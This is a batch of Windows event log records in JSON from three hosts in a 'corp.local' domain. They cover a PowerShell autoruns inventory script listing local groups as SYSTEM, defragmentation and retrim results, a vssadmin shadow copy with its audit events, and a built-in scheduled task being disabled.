{"EventTime":"2021-10-02T16:45:02.542194+05:45","Hostname":"IT03.corp.local","Keywords":"0","EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":40962,"SourceName":"Microsoft-Windows-PowerShell","ProviderGuid":"{A0C1853B-5C40-4B15-8766-3CF1C58F985A}","Version":1,"TaskValue":4,"OpcodeValue":2,"RecordNumber":708641,"ActivityID":"{C4CABCCB-A926-0000-84AD-CCC426A9D701}","ExecutionProcessID":6928,"ExecutionThreadID":1316,"Channel":"Microsoft-Windows-PowerShell/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"PowerShell console is ready for user input","Category":"PowerShell Console Startup","Opcode":"Stop","EventData":"","EventReceivedTime":"2021-10-02T16:45:03.693979+05:45","SourceModuleName":"in_win","SourceModuleType":"im_msvistalog"}
{"EventTime":"2021-10-02T16:54:39.638863+05:45","Hostname":"IT03.corp.local","Keywords":"0","EventType":"VERBOSE","SeverityValue":1,"Severity":"DEBUG","EventID":4104,"SourceName":"Microsoft-Windows-PowerShell","ProviderGuid":"{A0C1853B-5C40-4B15-8766-3CF1C58F985A}","Version":1,"TaskValue":2,"OpcodeValue":15,"RecordNumber":711200,"ActivityID":"{C4CABCCB-A926-0000-DBB9-CCC426A9D701}","ExecutionProcessID":6928,"ExecutionThreadID":6804,"Channel":"Microsoft-Windows-PowerShell/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Creating Scriptblock text (1 of 1):\r\n{\n\n        $principalName = $_.Name.Split(\"\\\")[1] + \"@\" + $DomainFQDN\n\n        $Member = New-Object PSObject\n        $Member | Add-Member Noteproperty 'GroupName' $GroupName\n        $Member | Add-Member Noteproperty 'PrincipalType' $_.ObjectClass\n        $Member | Add-Member Noteproperty 'PrincipalName' $principalname\n\n        $Data = @\"\n\nGroupName: $($Member.GroupName)\nPrincipalType: $($Member.PrincipalType)\nPrincipalName: $($Member.PrincipalName)\n\"@\n\n        Write-EventLog -LogName Autoruns -Source AutorunsToWinEventLog -EntryType Information -EventId 2 -Message $Data\n\n    }\r\n\r\nScriptBlock ID: a0cb3c3a-5b5e-47dd-96ee-aa0a898ae82c\r\nPath: C:\\Program Files\\AutorunsToWinEventLog\\AutorunsToWinEventLog.ps1","Category":"Execute a Remote Command","Opcode":"On create calls","MessageNumber":"1","MessageTotal":"1","ScriptBlockText":"{\n\n        $principalName = $_.Name.Split(\"\\\")[1] + \"@\" + $DomainFQDN\n\n        $Member = New-Object PSObject\n        $Member | Add-Member Noteproperty 'GroupName' $GroupName\n        $Member | Add-Member Noteproperty 'PrincipalType' $_.ObjectClass\n        $Member | Add-Member Noteproperty 'PrincipalName' $principalname\n\n        $Data = @\"\n\nGroupName: $($Member.GroupName)\nPrincipalType: $($Member.PrincipalType)\nPrincipalName: $($Member.PrincipalName)\n\"@\n\n        Write-EventLog -LogName Autoruns -Source AutorunsToWinEventLog -EntryType Information -EventId 2 -Message $Data\n\n    }","ScriptBlockId":"a0cb3c3a-5b5e-47dd-96ee-aa0a898ae82c","Path":"C:\\Program Files\\AutorunsToWinEventLog\\AutorunsToWinEventLog.ps1","EventReceivedTime":"2021-10-02T16:54:40.745689+05:45","SourceModuleName":"in_win","SourceModuleType":"im_msvistalog"}
{"EventTime":"2021-10-02T16:54:39.573009+05:45","Hostname":"IT03.corp.local","Keywords":"0","EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":4103,"SourceName":"Microsoft-Windows-PowerShell","ProviderGuid":"{A0C1853B-5C40-4B15-8766-3CF1C58F985A}","Version":1,"TaskValue":106,"OpcodeValue":20,"RecordNumber":711197,"ActivityID":"{C4CABCCB-A926-0001-D3B7-CCC426A9D701}","ExecutionProcessID":6928,"ExecutionThreadID":6804,"Channel":"Microsoft-Windows-PowerShell/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"CommandInvocation(Get-LocalGroup): \"Get-LocalGroup\"\r\nCommandInvocation(Where-Object): \"Where-Object\"\r\nParameterBinding(Where-Object): name=\"FilterScript\"; value=\"$_.SID -Match \"S-1-5-32-555\" -Or $_.SID -Match \"S-1-5-32-544\" -Or $_.SID -Match\n \"S-1-5-32-562\"\"\r\nParameterBinding(Where-Object): name=\"InputObject\"; value=\"Netmon Users\"\r\nParameterBinding(Where-Object): name=\"InputObject\"; value=\"Access Control Assistance Operators\"\r\nParameterBinding(Where-Object): name=\"InputObject\"; value=\"Administrators\"\r\nParameterBinding(Where-Object): name=\"InputObject\"; value=\"Backup Operators\"\r\nParameterBinding(Where-Object): name=\"InputObject\"; value=\"Certificate Service DCOM Access\"\r\nParameterBinding(Where-Object): name=\"InputObject\"; value=\"Cryptographic Operators\"\r\nParameterBinding(Where-Object): name=\"InputObject\"; value=\"Device Owners\"\r\nParameterBinding(Where-Object): name=\"InputObject\"; value=\"Distributed COM Users\"\r\nParameterBinding(Where-Object): name=\"InputObject\"; value=\"Event Log Readers\"\r\nParameterBinding(Where-Object): name=\"InputObject\"; value=\"Guests\"\r\nParameterBinding(Where-Object): name=\"InputObject\"; value=\"Hyper-V Administrators\"\r\nParameterBinding(Where-Object): name=\"InputObject\"; value=\"IIS_IUSRS\"\r\nParameterBinding(Where-Object): name=\"InputObject\"; value=\"Network Configuration Operators\"\r\nParameterBinding(Where-Object): name=\"InputObject\"; value=\"Performance Log Users\"\r\nParameterBinding(Where-Object): name=\"InputObject\"; value=\"Performance Monitor Users\"\r\nParameterBinding(Where-Object): name=\"InputObject\"; value=\"Power Users\"\r\nParameterBinding(Where-Object): name=\"InputObject\"; value=\"Print Operators\"\r\nParameterBinding(Where-Object): name=\"InputObject\"; value=\"RDS Endpoint Servers\"\r\nParameterBinding(Where-Object): name=\"InputObject\"; value=\"RDS Management Servers\"\r\nParameterBinding(Where-Object): name=\"InputObject\"; value=\"RDS Remote Access Servers\"\r\nParameterBinding(Where-Object): name=\"InputObject\"; value=\"Remote Desktop Users\"\r\nParameterBinding(Where-Object): name=\"InputObject\"; value=\"Remote Management Users\"\r\nParameterBinding(Where-Object): name=\"InputObject\"; value=\"Replicator\"\r\nParameterBinding(Where-Object): name=\"InputObject\"; value=\"Storage Replica Administrators\"\r\nParameterBinding(Where-Object): name=\"InputObject\"; value=\"System Managed Accounts Group\"\r\nParameterBinding(Where-Object): name=\"InputObject\"; value=\"Users\"\r\n\r\n\r\nContext:\r\n        Severity = Informational\r\n        Host Name = ConsoleHost\r\n        Host Version = 5.1.17763.1971\r\n        Host ID = 6caa4573-d7c9-47fa-9821-6edb0451c0ca\r\n        Host Application = powershell.exe -WindowStyle hidden c:\\PROGRA~1\\AutorunsToWinEventLog\\AutorunsToWinEventLog.ps1\r\n        Engine Version = 5.1.17763.1971\r\n        Runspace ID = 7c4e8408-2681-4c41-8e5b-84bf86b519c5\r\n        Pipeline ID = 1\r\n        Command Name = Get-LocalGroup\r\n        Command Type = Cmdlet\r\n        Script Name = C:\\Program Files\\AutorunsToWinEventLog\\AutorunsToWinEventLog.ps1\r\n        Command Path = \r\n        Sequence Number = 5118\r\n        User = CORP\\SYSTEM\r\n        Connected User = \r\n        Shell ID = Microsoft.PowerShell\r\n\r\n\r\nUser Data:\r\n\r\n","Category":"Executing Pipeline","Opcode":"To be used when operation is just executing a method","ContextInfo":"        Severity = Informational\r\n        Host Name = ConsoleHost\r\n        Host Version = 5.1.17763.1971\r\n        Host ID = 6caa4573-d7c9-47fa-9821-6edb0451c0ca\r\n        Host Application = powershell.exe -WindowStyle hidden c:\\PROGRA~1\\AutorunsToWinEventLog\\AutorunsToWinEventLog.ps1\r\n        Engine Version = 5.1.17763.1971\r\n        Runspace ID = 7c4e8408-2681-4c41-8e5b-84bf86b519c5\r\n        Pipeline ID = 1\r\n        Command Name = Get-LocalGroup\r\n        Command Type = Cmdlet\r\n        Script Name = C:\\Program Files\\AutorunsToWinEventLog\\AutorunsToWinEventLog.ps1\r\n        Command Path = \r\n        Sequence Number = 5118\r\n        User = CORP\\SYSTEM\r\n        Connected User = \r\n        Shell ID = Microsoft.PowerShell\r\n","Payload":"CommandInvocation(Get-LocalGroup): \"Get-LocalGroup\"\r\nCommandInvocation(Where-Object): \"Where-Object\"\r\nParameterBinding(Where-Object): name=\"FilterScript\"; value=\"$_.SID -Match \"S-1-5-32-555\" -Or $_.SID -Match \"S-1-5-32-544\" -Or $_.SID -Match\n \"S-1-5-32-562\"\"\r\nParameterBinding(Where-Object): name=\"InputObject\"; value=\"Netmon Users\"\r\nParameterBinding(Where-Object): name=\"InputObject\"; value=\"Access Control Assistance Operators\"\r\nParameterBinding(Where-Object): name=\"InputObject\"; value=\"Administrators\"\r\nParameterBinding(Where-Object): name=\"InputObject\"; value=\"Backup Operators\"\r\nParameterBinding(Where-Object): name=\"InputObject\"; value=\"Certificate Service DCOM Access\"\r\nParameterBinding(Where-Object): name=\"InputObject\"; value=\"Cryptographic Operators\"\r\nParameterBinding(Where-Object): name=\"InputObject\"; value=\"Device Owners\"\r\nParameterBinding(Where-Object): name=\"InputObject\"; value=\"Distributed COM Users\"\r\nParameterBinding(Where-Object): name=\"InputObject\"; value=\"Event Log Readers\"\r\nParameterBinding(Where-Object): name=\"InputObject\"; value=\"Guests\"\r\nParameterBinding(Where-Object): name=\"InputObject\"; value=\"Hyper-V Administrators\"\r\nParameterBinding(Where-Object): name=\"InputObject\"; value=\"IIS_IUSRS\"\r\nParameterBinding(Where-Object): name=\"InputObject\"; value=\"Network Configuration Operators\"\r\nParameterBinding(Where-Object): name=\"InputObject\"; value=\"Performance Log Users\"\r\nParameterBinding(Where-Object): name=\"InputObject\"; value=\"Performance Monitor Users\"\r\nParameterBinding(Where-Object): name=\"InputObject\"; value=\"Power Users\"\r\nParameterBinding(Where-Object): name=\"InputObject\"; value=\"Print Operators\"\r\nParameterBinding(Where-Object): name=\"InputObject\"; value=\"RDS Endpoint Servers\"\r\nParameterBinding(Where-Object): name=\"InputObject\"; value=\"RDS Management Servers\"\r\nParameterBinding(Where-Object): name=\"InputObject\"; value=\"RDS Remote Access Servers\"\r\nParameterBinding(Where-Object): name=\"InputObject\"; value=\"Remote Desktop Users\"\r\nParameterBinding(Where-Object): name=\"InputObject\"; value=\"Remote Management Users\"\r\nParameterBinding(Where-Object): name=\"InputObject\"; value=\"Replicator\"\r\nParameterBinding(Where-Object): name=\"InputObject\"; value=\"Storage Replica Administrators\"\r\nParameterBinding(Where-Object): name=\"InputObject\"; value=\"System Managed Accounts Group\"\r\nParameterBinding(Where-Object): name=\"InputObject\"; value=\"Users\"\r\n","EventReceivedTime":"2021-10-02T16:54:40.745689+05:45","SourceModuleName":"in_win","SourceModuleType":"im_msvistalog"}
{"EventTime":"2021-10-02T16:54:39.636283+05:45","Hostname":"IT03.corp.local","Keywords":"36028797018963968","EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":800,"SourceName":"PowerShell","TaskValue":8,"RecordNumber":404964,"ExecutionProcessID":0,"ExecutionThreadID":0,"Channel":"Windows PowerShell","Message":"Pipeline execution details for command line:         $Member = New-Object PSObject\n. \r\n\r\nContext Information: \r\n\tDetailSequence=1\r\n\tDetailTotal=1\r\n\r\n\tSequenceNumber=5119\r\n\r\n\tUserId=CORP\\SYSTEM\r\n\tHostName=ConsoleHost\r\n\tHostVersion=5.1.17763.1971\r\n\tHostId=6caa4573-d7c9-47fa-9821-6edb0451c0ca\r\n\tHostApplication=powershell.exe -WindowStyle hidden c:\\PROGRA~1\\AutorunsToWinEventLog\\AutorunsToWinEventLog.ps1\r\n\tEngineVersion=5.1.17763.1971\r\n\tRunspaceId=7c4e8408-2681-4c41-8e5b-84bf86b519c5\r\n\tPipelineId=1\r\n\tScriptName=C:\\Program Files\\AutorunsToWinEventLog\\AutorunsToWinEventLog.ps1\r\n\tCommandLine=        $Member = New-Object PSObject\n \r\n\r\nDetails: \r\nCommandInvocation(New-Object): \"New-Object\"\r\nParameterBinding(New-Object): name=\"TypeName\"; value=\"PSObject\"\r\n","Category":"Pipeline Execution Details","Opcode":"Info","EventData":"<Data>        $Member = New-Object PSObject\n</Data><Data>\tDetailSequence=1\r\n\tDetailTotal=1\r\n\r\n\tSequenceNumber=5119\r\n\r\n\tUserId=CORP\\SYSTEM\r\n\tHostName=ConsoleHost\r\n\tHostVersion=5.1.17763.1971\r\n\tHostId=6caa4573-d7c9-47fa-9821-6edb0451c0ca\r\n\tHostApplication=powershell.exe -WindowStyle hidden c:\\PROGRA~1\\AutorunsToWinEventLog\\AutorunsToWinEventLog.ps1\r\n\tEngineVersion=5.1.17763.1971\r\n\tRunspaceId=7c4e8408-2681-4c41-8e5b-84bf86b519c5\r\n\tPipelineId=1\r\n\tScriptName=C:\\Program Files\\AutorunsToWinEventLog\\AutorunsToWinEventLog.ps1\r\n\tCommandLine=        $Member = New-Object PSObject\n</Data><Data>CommandInvocation(New-Object): \"New-Object\"\r\nParameterBinding(New-Object): name=\"TypeName\"; value=\"PSObject\"\r\n</Data>","EventReceivedTime":"2021-10-02T16:54:39.698777+05:45","SourceModuleName":"in_win","SourceModuleType":"im_msvistalog"}
{"EventTime":"2021-10-02T16:45:02.452496+05:45","Hostname":"IT03.corp.local","Keywords":"0","EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":53504,"SourceName":"Microsoft-Windows-PowerShell","ProviderGuid":"{A0C1853B-5C40-4B15-8766-3CF1C58F985A}","Version":1,"TaskValue":111,"OpcodeValue":10,"RecordNumber":708640,"ActivityID":"{C4CABCCB-A926-0000-84AD-CCC426A9D701}","ExecutionProcessID":6928,"ExecutionThreadID":1060,"Channel":"Microsoft-Windows-PowerShell/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Windows PowerShell has started an IPC listening thread on process: 6928 in AppDomain: DefaultAppDomain.","Category":"PowerShell Named Pipe IPC","Opcode":"Open (async)","param1":"6928","param2":"DefaultAppDomain","EventReceivedTime":"2021-10-02T16:45:03.678420+05:45","SourceModuleName":"in_win","SourceModuleType":"im_msvistalog"}
{"EventTime":"2021-10-02T16:54:39.917570+05:45","Hostname":"IT03.corp.local","Keywords":"36028797018963968","EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":403,"SourceName":"PowerShell","TaskValue":4,"RecordNumber":404984,"ExecutionProcessID":0,"ExecutionThreadID":0,"Channel":"Windows PowerShell","Message":"Engine state is changed from Available to Stopped. \r\n\r\nDetails: \r\n\tNewEngineState=Stopped\r\n\tPreviousEngineState=Available\r\n\r\n\tSequenceNumber=5159\r\n\r\n\tHostName=ConsoleHost\r\n\tHostVersion=5.1.17763.1971\r\n\tHostId=6caa4573-d7c9-47fa-9821-6edb0451c0ca\r\n\tHostApplication=powershell.exe -WindowStyle hidden c:\\PROGRA~1\\AutorunsToWinEventLog\\AutorunsToWinEventLog.ps1\r\n\tEngineVersion=5.1.17763.1971\r\n\tRunspaceId=7c4e8408-2681-4c41-8e5b-84bf86b519c5\r\n\tPipelineId=\r\n\tCommandName=\r\n\tCommandType=\r\n\tScriptName=\r\n\tCommandPath=\r\n\tCommandLine=","Category":"Engine Lifecycle","Opcode":"Info","EventData":"<Data>Stopped</Data><Data>Available</Data><Data>\tNewEngineState=Stopped\r\n\tPreviousEngineState=Available\r\n\r\n\tSequenceNumber=5159\r\n\r\n\tHostName=ConsoleHost\r\n\tHostVersion=5.1.17763.1971\r\n\tHostId=6caa4573-d7c9-47fa-9821-6edb0451c0ca\r\n\tHostApplication=powershell.exe -WindowStyle hidden c:\\PROGRA~1\\AutorunsToWinEventLog\\AutorunsToWinEventLog.ps1\r\n\tEngineVersion=5.1.17763.1971\r\n\tRunspaceId=7c4e8408-2681-4c41-8e5b-84bf86b519c5\r\n\tPipelineId=\r\n\tCommandName=\r\n\tCommandType=\r\n\tScriptName=\r\n\tCommandPath=\r\n\tCommandLine=</Data>","EventReceivedTime":"2021-10-02T16:54:40.776938+05:45","SourceModuleName":"in_win","SourceModuleType":"im_msvistalog"}
{"EventTime":"2021-10-02T18:44:31.978275+05:45","Hostname":"IT02.corp.local","Keywords":"36028797018963968","EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":258,"SourceName":"Microsoft-Windows-Defrag","Version":0,"TaskValue":0,"OpcodeValue":0,"RecordNumber":70122,"ExecutionProcessID":0,"ExecutionThreadID":0,"Channel":"Application","Message":"The storage optimizer successfully completed defragmentation on (C:)","Opcode":"Info","Data":"defragmentation","Data_1":"(C:)","EventData.Binary":"0000000034020000FA0100000000000022B651A2296BEDD85E9C8D030000000000000000","EventReceivedTime":"2021-10-02T18:44:32.045196+05:45","SourceModuleName":"in_win","SourceModuleType":"im_msvistalog"}
{"EventTime":"2021-10-02T18:44:31.978275+05:45","Hostname":"IT02.corp.local","Keywords":"36028797018963968","EventType":"ERROR","SeverityValue":4,"Severity":"ERROR","EventID":264,"SourceName":"Microsoft-Windows-Defrag","Version":0,"TaskValue":0,"OpcodeValue":0,"RecordNumber":70121,"ExecutionProcessID":0,"ExecutionThreadID":0,"Channel":"Application","Message":"The storage optimizer couldn't complete retrim on (C:) because: The operation requested is not supported by the hardware backing the volume. (0x8900002A)","Data":"retrim","Data_1":"(C:)","Data_2":"The operation requested is not supported by the hardware backing the volume. (0x8900002A)","EventData.Binary":"2A000089800200008D0000009000000022B63823DBB1BD381B0700000000000000000000","EventReceivedTime":"2021-10-02T18:44:32.045196+05:45","SourceModuleName":"in_win","SourceModuleType":"im_msvistalog"}
{"EventTime":"2021-10-01T12:00:01.542865+05:45","Hostname":"IT03.corp.local","Keywords":"9268408033128480768","EventType":"AUDIT_SUCCESS","SeverityValue":2,"Severity":"INFO","EventID":8222,"SourceName":"VSSAudit","TaskValue":3,"RecordNumber":40728690,"ExecutionProcessID":0,"ExecutionThreadID":0,"Channel":"Security","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Shadow copy has been created.\r\n \r\n User SID:\t\t\tS-1-5-18\r\n User name:\t\t\tNT AUTHORITY\\SYSTEM\r\n Process ID:\t\t\t0x00000000000005ec\r\n Process image name:\t\tC:\\Windows\\System32\\vssadmin.exe\r\n \r\n Shadow Set ID:\t\t\t{2511584f-5a90-4d45-8ff1-ff021c177669}\r\n Shadow ID:\t\t\t{bb8a0598-7c9b-4ce0-9ffc-382a8e42483b}\r\n Provider ID:\t\t\t{b5946137-7b9f-4925-af80-51abd60b20d5}\r\n Original Machine:\t\tIT03.corp.local\r\n Original Volume:\t\t\t\\\\?\\Volume{8945544a-0000-0000-0000-f09d07000000}\\\r\n Shadow device name:\t\t\\\\?\\GLOBALROOT\\Device\\HarddiskVolumeShadowCopy14\r\n","Opcode":"Info","EventData":"<Data>S-1-5-18</Data><Data>NT AUTHORITY\\SYSTEM</Data><Data>0x00000000000005ec</Data><Data>C:\\Windows\\System32\\vssadmin.exe</Data><Data>{2511584f-5a90-4d45-8ff1-ff021c177669}</Data><Data>{bb8a0598-7c9b-4ce0-9ffc-382a8e42483b}</Data><Data>{b5946137-7b9f-4925-af80-51abd60b20d5}</Data><Data>IT03.corp.local</Data><Data>\\\\?\\Volume{8945544a-0000-0000-0000-f09d07000000}\\</Data><Data>\\\\?\\GLOBALROOT\\Device\\HarddiskVolumeShadowCopy14</Data>","EventReceivedTime":"2021-10-01T12:00:03.496423+05:45","SourceModuleName":"in_win","SourceModuleType":"im_msvistalog"}
{"EventTime":"2021-10-01T12:00:01.549804+05:45","Hostname":"IT03.corp.local","Keywords":"9232379236109516800","EventType":"AUDIT_SUCCESS","SeverityValue":2,"Severity":"INFO","EventID":4904,"SourceName":"Microsoft-Windows-Security-Auditing","ProviderGuid":"{54849625-5478-4994-A5BA-3E3B0328C30D}","Version":0,"TaskValue":13568,"OpcodeValue":0,"RecordNumber":40728689,"ActivityID":"{C4CABCCB-A926-0000-82BE-CAC426A9D701}","ExecutionProcessID":632,"ExecutionThreadID":5188,"Channel":"Security","Message":"An attempt was made to register a security event source.\r\n\r\nSubject :\r\n\tSecurity ID:\t\tS-1-5-18\r\n\tAccount Name:\t\tIT03$\r\n\tAccount Domain:\t\tCORP\r\n\tLogon ID:\t\t0x3E7\r\n\r\nProcess:\r\n\tProcess ID:\t0x1870\r\n\tProcess Name:\tC:\\Windows\\System32\\VSSVC.exe\r\n\r\nEvent Source:\r\n\tSource Name:\tVSSAudit\r\n\tEvent Source ID:\t0x69EE42E","Category":"Audit Policy Change","Opcode":"Info","SubjectUserSid":"S-1-5-18","SubjectUserName":"IT03$","SubjectDomainName":"CORP","SubjectLogonId":"0x3e7","AuditSourceName":"VSSAudit","EventSourceId":"0x69ee42e","ProcessId":"0x1870","ProcessName":"C:\\Windows\\System32\\VSSVC.exe","EventReceivedTime":"2021-10-01T12:00:03.496423+05:45","SourceModuleName":"in_win","SourceModuleType":"im_msvistalog"}
{"EventTime":"2021-10-01T12:00:01.552466+05:45","Hostname":"IT03.corp.local","Keywords":"9232379236109516800","EventType":"AUDIT_SUCCESS","SeverityValue":2,"Severity":"INFO","EventID":4905,"SourceName":"Microsoft-Windows-Security-Auditing","ProviderGuid":"{54849625-5478-4994-A5BA-3E3B0328C30D}","Version":0,"TaskValue":13568,"OpcodeValue":0,"RecordNumber":40728691,"ActivityID":"{C4CABCCB-A926-0000-82BE-CAC426A9D701}","ExecutionProcessID":632,"ExecutionThreadID":5188,"Channel":"Security","Message":"An attempt was made to unregister a security event source.\r\n\r\nSubject\r\n\tSecurity ID:\t\tS-1-5-18\r\n\tAccount Name:\t\tIT03$\r\n\tAccount Domain:\t\tCORP\r\n\tLogon ID:\t\t0x3E7\r\n\r\nProcess:\r\n\tProcess ID:\t0x1870\r\n\tProcess Name:\tC:\\Windows\\System32\\VSSVC.exe\r\n\r\nEvent Source:\r\n\tSource Name:\tVSSAudit\r\n\tEvent Source ID:\t0x69EE42E","Category":"Audit Policy Change","Opcode":"Info","SubjectUserSid":"S-1-5-18","SubjectUserName":"IT03$","SubjectDomainName":"CORP","SubjectLogonId":"0x3e7","AuditSourceName":"VSSAudit","EventSourceId":"0x69ee42e","ProcessId":"0x1870","ProcessName":"C:\\Windows\\System32\\VSSVC.exe","EventReceivedTime":"2021-10-01T12:00:03.496423+05:45","SourceModuleName":"in_win","SourceModuleType":"im_msvistalog"}
{"EventTime":"2021-10-02T00:48:15.608875+05:45","Hostname":"IT02.corp.local","Keywords":"36028797018963968","EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":8224,"SourceName":"VSS","Version":0,"TaskValue":0,"OpcodeValue":0,"RecordNumber":70050,"ExecutionProcessID":0,"ExecutionThreadID":0,"Channel":"Application","Message":"The VSS service is shutting down due to idle timeout. ","Opcode":"Info","EventData.Binary":"2D20436F64653A2020434F525356434330303030303735392D2043616C6C3A2020434F525356434330303030303734312D205049443A202030303030393634342D205449443A202030303030383430382D20434D443A2020433A5C57696E646F77735C73797374656D33325C76737376632E6578652020202D20557365723A204E616D653A204E5420415554484F524954595C53595354454D2C205349443A532D312D352D313820","EventReceivedTime":"2021-10-02T00:48:16.266564+05:45","SourceModuleName":"in_win","SourceModuleType":"im_msvistalog"}
{"EventTime":"2021-10-01T12:35:18.147872+05:45","Hostname":"IT01.corp.local","Keywords":"9232379236109516800","EventType":"AUDIT_SUCCESS","SeverityValue":2,"Severity":"INFO","EventID":4701,"SourceName":"Microsoft-Windows-Security-Auditing","ProviderGuid":"{54849625-5478-4994-A5BA-3E3B0328C30D}","Version":1,"TaskValue":12804,"OpcodeValue":0,"RecordNumber":4064670,"ActivityID":"{1861A8E2-AEB2-0000-61A9-6118B2AED701}","ExecutionProcessID":640,"ExecutionThreadID":4708,"Channel":"Security","Message":"A scheduled task was disabled.\r\n\r\nSubject:\r\n\tSecurity ID:\t\tS-1-5-20\r\n\tAccount Name:\t\tIT01$\r\n\tAccount Domain:\t\tCORP\r\n\tLogon ID:\t\t0x3E4\r\n\r\nTask Information:\r\n\tTask Name: \t\t\\Microsoft\\Windows\\SoftwareProtectionPlatform\\SvcRestartTask\r\n\tTask Content: \t\t<?xml version=\"1.0\" encoding=\"UTF-16\"?>\r\n<Task version=\"1.6\" xmlns=\"http://schemas.microsoft.com/windows/2004/02/mit/task\">\r\n  <RegistrationInfo>\r\n    <Version>1.0</Version>\r\n    <SecurityDescriptor>D:P(A;;FA;;;SY)(A;;FA;;;BA)(A;;FA;;;S-1-5-80-123231216-2592883651-3715271367-3753151631-4175906628)(A;;FR;;;S-1-5-87-2912274048-3994893941-1669128114-1310430903-1263774323)</SecurityDescriptor>\r\n    <Source>$(@%systemroot%\\system32\\sppc.dll,-200)</Source>\r\n    <Author>$(@%systemroot%\\system32\\sppc.dll,-200)</Author>\r\n    <Description>$(@%systemroot%\\system32\\sppc.dll,-201)</Description>\r\n    <URI>\\Microsoft\\Windows\\SoftwareProtectionPlatform\\SvcRestartTask</URI>\r\n  </RegistrationInfo>\r\n  <Principals>\r\n    <Principal id=\"NetworkService\">\r\n      <UserId>S-1-5-20</UserId>\r\n    </Principal>\r\n  </Principals>\r\n  <Settings>\r\n    <AllowHardTerminate>false</AllowHardTerminate>\r\n    <DisallowStartIfOnBatteries>false</DisallowStartIfOnBatteries>\r\n    <StopIfGoingOnBatteries>false</StopIfGoingOnBatteries>\r\n    <Enabled>false</Enabled>\r\n    <ExecutionTimeLimit>PT0S</ExecutionTimeLimit>\r\n    <Hidden>true</Hidden>\r\n    <MultipleInstancesPolicy>IgnoreNew</MultipleInstancesPolicy>\r\n    <RestartOnFailure>\r\n      <Count>3</Count>\r\n      <Interval>PT1M</Interval>\r\n    </RestartOnFailure>\r\n    <StartWhenAvailable>true</StartWhenAvailable>\r\n    <IdleSettings>\r\n      <StopOnIdleEnd>true</StopOnIdleEnd>\r\n      <RestartOnIdle>false</RestartOnIdle>\r\n    </IdleSettings>\r\n    <UseUnifiedSchedulingEngine>true</UseUnifiedSchedulingEngine>\r\n  </Settings>\r\n  <Triggers>\r\n    <CalendarTrigger>\r\n      <StartBoundary>2021-10-01T12:34:48+05:45</StartBoundary>\r\n      <ScheduleByDay>\r\n        <DaysInterval>1</DaysInterval>\r\n      </ScheduleByDay>\r\n    </CalendarTrigger>\r\n  </Triggers>\r\n  <Actions Context=\"NetworkService\">\r\n    <ComHandler>\r\n      <ClassId>{B1AEBB5D-EAD9-4476-B375-9C3ED9F32AFC}</ClassId>\r\n      <Data><![CDATA[timer]]></Data>\r\n    </ComHandler>\r\n  </Actions>\r\n</Task>\r\n\r\nOther Information:\r\n\tProcessCreationTime: \t\t5066549580795729\r\n\tClientProcessId: \t\t\t5784\r\n\tParentProcessId: \t\t\t604\r\n\tFQDN: \t\t0\r\n\t","Category":"Other Object Access Events","Opcode":"Info","SubjectUserSid":"S-1-5-20","SubjectUserName":"IT01$","SubjectDomainName":"CORP","SubjectLogonId":"0x3e4","TaskName":"\\Microsoft\\Windows\\SoftwareProtectionPlatform\\SvcRestartTask","TaskContent":"<?xml version=\"1.0\" encoding=\"UTF-16\"?>\n<Task version=\"1.6\" xmlns=\"http://schemas.microsoft.com/windows/2004/02/mit/task\">\n  <RegistrationInfo>\n    <Version>1.0</Version>\n    <SecurityDescriptor>D:P(A;;FA;;;SY)(A;;FA;;;BA)(A;;FA;;;S-1-5-80-123231216-2592883651-3715271367-3753151631-4175906628)(A;;FR;;;S-1-5-87-2912274048-3994893941-1669128114-1310430903-1263774323)</SecurityDescriptor>\n    <Source>$(@%systemroot%\\system32\\sppc.dll,-200)</Source>\n    <Author>$(@%systemroot%\\system32\\sppc.dll,-200)</Author>\n    <Description>$(@%systemroot%\\system32\\sppc.dll,-201)</Description>\n    <URI>\\Microsoft\\Windows\\SoftwareProtectionPlatform\\SvcRestartTask</URI>\n  </RegistrationInfo>\n  <Principals>\n    <Principal id=\"NetworkService\">\n      <UserId>S-1-5-20</UserId>\n    </Principal>\n  </Principals>\n  <Settings>\n    <AllowHardTerminate>false</AllowHardTerminate>\n    <DisallowStartIfOnBatteries>false</DisallowStartIfOnBatteries>\n    <StopIfGoingOnBatteries>false</StopIfGoingOnBatteries>\n    <Enabled>false</Enabled>\n    <ExecutionTimeLimit>PT0S</ExecutionTimeLimit>\n    <Hidden>true</Hidden>\n    <MultipleInstancesPolicy>IgnoreNew</MultipleInstancesPolicy>\n    <RestartOnFailure>\n      <Count>3</Count>\n      <Interval>PT1M</Interval>\n    </RestartOnFailure>\n    <StartWhenAvailable>true</StartWhenAvailable>\n    <IdleSettings>\n      <StopOnIdleEnd>true</StopOnIdleEnd>\n      <RestartOnIdle>false</RestartOnIdle>\n    </IdleSettings>\n    <UseUnifiedSchedulingEngine>true</UseUnifiedSchedulingEngine>\n  </Settings>\n  <Triggers>\n    <CalendarTrigger>\n      <StartBoundary>2021-10-01T12:34:48+05:45</StartBoundary>\n      <ScheduleByDay>\n        <DaysInterval>1</DaysInterval>\n      </ScheduleByDay>\n    </CalendarTrigger>\n  </Triggers>\n  <Actions Context=\"NetworkService\">\n    <ComHandler>\n      <ClassId>{B1AEBB5D-EAD9-4476-B375-9C3ED9F32AFC}</ClassId>\n      <Data><![CDATA[timer]]></Data>\n    </ComHandler>\n  </Actions>\n</Task>","ClientProcessStartKey":"5066549580795729","ClientProcessId":"5784","ParentProcessId":"604","RpcCallClientLocality":"0","FQDN":"IT01.corp.local","EventReceivedTime":"2021-10-01T12:35:19.317363+05:45","SourceModuleName":"in_win","SourceModuleType":"im_msvistalog"}
